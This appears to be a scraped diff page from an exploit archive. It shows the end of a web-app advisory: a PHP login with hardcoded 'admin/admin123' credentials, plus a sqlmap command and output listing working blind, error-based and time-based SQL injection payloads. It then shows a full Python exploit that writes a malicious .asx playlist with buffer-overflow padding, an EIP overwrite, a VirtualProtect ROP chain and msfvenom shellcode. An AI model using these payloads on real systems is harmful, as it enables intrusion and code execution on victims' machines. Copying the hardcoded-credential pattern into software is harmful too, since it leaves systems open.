The functions.php file line 88 has hardcoded admin credentials.
|
||||
elseif($uType == 'admin'){
|
||||
//$_SESSION['user_id'] = $row['sid'];
|
||||
if($userName == 'admin' && $password == 'admin123'){
|
||||
$_SESSION['user_id'] = 0;
|
||||
$_SESSION['user_name'] = 'Administrator';
|
||||
$_SESSION['user_type'] = 'admin';
|
||||
header('Location: '.WEB_ROOT.'index.php');
|
||||
exit;
|
||||
|
||||
Using the hardcoded admin credentials we then have access to the view.php file that is vulnerable to Blind SQL injection.
|
||||
|
||||
-HTTP Method : GET
|
||||
|
||||
- Sqlmap command: sqlmap -u 'http://192.168.1.104/view.php?mod=admin&view=repod&id=plans' --cookie="PHPSESSID=t1bc9vj67odrj3bd096g0rffe0"
|
||||
|
||||
- Sqlmap Output :
|
||||
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
|
||||
[00:47:53] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
|
||||
[00:47:53] [INFO] testing 'MySQL UNION query (98) - 22 to 40 columns'
|
||||
[00:47:53] [INFO] testing 'MySQL UNION query (98) - 42 to 60 columns'
|
||||
[00:47:53] [INFO] testing 'MySQL UNION query (98) - 62 to 80 columns'
|
||||
[00:47:54] [INFO] testing 'MySQL UNION query (98) - 82 to 100 columns'
|
||||
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
|
||||
sqlmap identified the following injection point(s) with a total of 650 HTTP(s) requests:
|
||||
---
|
||||
Parameter: id (GET)
|
||||
Type: boolean-based blind
|
||||
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
|
||||
Payload: mod=admin&view=repod&id=plans WHERE 6586=6586 AND 9310=9310#
|
||||
|
||||
Type: error-based
|
||||
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
|
||||
Payload: mod=admin&view=repod&id=plans WHERE 3317=3317 AND (SELECT 4063 FROM(SELECT COUNT(*),CONCAT(0x7176767a71,(SELECT (ELT(4063=4063,1))),0x7170766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)--
|
||||
|
||||
Type: AND/OR time-based blind
|
||||
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
|
||||
Payload: mod=admin&view=repod&id=plans WHERE 4122=4122 AND (SELECT * FROM (SELECT(SLEEP(5)))zWVH)--
|
||||
---
|
||||
[00:47:57] [INFO] the back-end DBMS is MySQL
|
||||
web server operating system: Linux Ubuntu
|
||||
web application technology: Apache 2.4.7, PHP 5.5.9
|
||||
back-end DBMS: MySQL 5.0
|
||||
[00:47:57] [WARNING] HTTP error codes detected during run:
|
||||
500 (Internal Server Error) - 444 times
|
||||
83
platforms/windows/local/42963.py
Executable file
83
platforms/windows/local/42963.py
Executable file
|
|
@ -0,0 +1,83 @@
|
|||
import struct,sys
|
||||
head ='''<ASX version="3.0">
|
||||
<Entry>
|
||||
<REF HREF="mms://site.com/ach/music/smpl/LACA-05928-002-tes_'''
|
||||
|
||||
#offset 17375
|
||||
junk = "A" *17375
|
||||
|
||||
#0x1003df8e
|
||||
#0x774e1035
|
||||
EIP="\x36\x10\x4e\x77"
|
||||
|
||||
adjust="A" *4
|
||||
|
||||
def create_rop_chain():
|
||||
|
||||
rop_gadgets = [
|
||||
0x73dd5dce, # POP EAX # RETN [MFC42.DLL]
|
||||
0x5d091368, # ptr to &VirtualProtect() [IAT COMCTL32.dll]
|
||||
0x7608708e, # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSVCP60.dll]
|
||||
0x73dd40f1, # XCHG EAX,ESI # RETN [MFC42.DLL]
|
||||
0x7c96feb7, # POP EBP # RETN [ntdll.dll]
|
||||
0x7608fcec, # & push esp # ret [MSVCP60.dll]
|
||||
0x01c395d4, # POP EAX # RETN [MSA2Mcodec00.dll]
|
||||
0xfffffdff, # Value to negate, will become 0x00000201
|
||||
0x77d74960, # NEG EAX # RETN [USER32.dll]
|
||||
0x7ca485b4, # XCHG EAX,EBX # RETN [SHELL32.dll]
|
||||
0x01d64827, # POP EAX # RETN [msvos.dll]
|
||||
0xffffffc0, # Value to negate, will become 0x00000040
|
||||
0x77d74960, # NEG EAX # RETN [USER32.dll]
|
||||
0x71ab9b46, # XCHG EAX,EDX # RETN [WS2_32.dll]
|
||||
0x1003fd11, # POP ECX # RETN [MSA2Mfilter03.dll]
|
||||
0x77da1d04, # &Writable location [USER32.dll]
|
||||
0x01d34691, # POP EDI # RETN [MSA2Mctn01.dll]
|
||||
0x76091182, # RETN (ROP NOP) [MSVCP60.dll]
|
||||
0x7d7da123, # POP EAX # RETN [WMVCore.DLL]
|
||||
0x90909090, # nop
|
||||
0x77195015, # PUSHAD # RETN [OLEAUT32.dll]
|
||||
]
|
||||
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
|
||||
|
||||
rop_chain = create_rop_chain()
|
||||
|
||||
#msfvenom -a x86 --platform Windows -p windows/exec cmd=calc.exe -f python -b "\x00\x0a\x0d EXITFUNC=seh
|
||||
#badcharacters "\x00\x0a\x0d"
|
||||
|
||||
buf = ""
|
||||
buf += "\xda\xd6\xba\xf5\xa4\x32\xf4\xd9\x74\x24\xf4\x5d\x31"
|
||||
buf += "\xc9\xb1\x31\x83\xc5\x04\x31\x55\x14\x03\x55\xe1\x46"
|
||||
buf += "\xc7\x08\xe1\x05\x28\xf1\xf1\x69\xa0\x14\xc0\xa9\xd6"
|
||||
buf += "\x5d\x72\x1a\x9c\x30\x7e\xd1\xf0\xa0\xf5\x97\xdc\xc7"
|
||||
buf += "\xbe\x12\x3b\xe9\x3f\x0e\x7f\x68\xc3\x4d\xac\x4a\xfa"
|
||||
buf += "\x9d\xa1\x8b\x3b\xc3\x48\xd9\x94\x8f\xff\xce\x91\xda"
|
||||
buf += "\xc3\x65\xe9\xcb\x43\x99\xb9\xea\x62\x0c\xb2\xb4\xa4"
|
||||
buf += "\xae\x17\xcd\xec\xa8\x74\xe8\xa7\x43\x4e\x86\x39\x82"
|
||||
buf += "\x9f\x67\x95\xeb\x10\x9a\xe7\x2c\x96\x45\x92\x44\xe5"
|
||||
buf += "\xf8\xa5\x92\x94\x26\x23\x01\x3e\xac\x93\xed\xbf\x61"
|
||||
buf += "\x45\x65\xb3\xce\x01\x21\xd7\xd1\xc6\x59\xe3\x5a\xe9"
|
||||
buf += "\x8d\x62\x18\xce\x09\x2f\xfa\x6f\x0b\x95\xad\x90\x4b"
|
||||
buf += "\x76\x11\x35\x07\x9a\x46\x44\x4a\xf0\x99\xda\xf0\xb6"
|
||||
buf += "\x9a\xe4\xfa\xe6\xf2\xd5\x71\x69\x84\xe9\x53\xce\x74"
|
||||
buf += "\x1b\x6e\xda\xe1\x82\x1b\xa7\x6f\x35\xf6\xeb\x89\xb6"
|
||||
buf += "\xf3\x93\x6d\xa6\x71\x96\x2a\x60\x69\xea\x23\x05\x8d"
|
||||
buf += "\x59\x43\x0c\xee\x3c\xd7\xcc\xdf\xdb\x5f\x76\x20"
|
||||
|
||||
shellcode="S"*10+buf
|
||||
|
||||
print "Length of shellcode is:",len(shellcode)
|
||||
print "Length of ropchain is:",len(rop_chain)
|
||||
|
||||
print"Calculating Garbage:",(26000-17375-4-4-len(shellcode)-len(rop_chain))
|
||||
|
||||
garbage= "C" *8303
|
||||
|
||||
foot ='''_playlis.wma"/>
|
||||
</Entry>
|
||||
</ASX>'''
|
||||
|
||||
payload=head+junk+EIP+adjust+rop_chain+shellcode+garbage+foot
|
||||
|
||||
fobj = open("exploit.asx","w")
|
||||
fobj.write(payload)
|
||||
fobj.close()
|
||||
Loading…
Add table
Reference in a new issue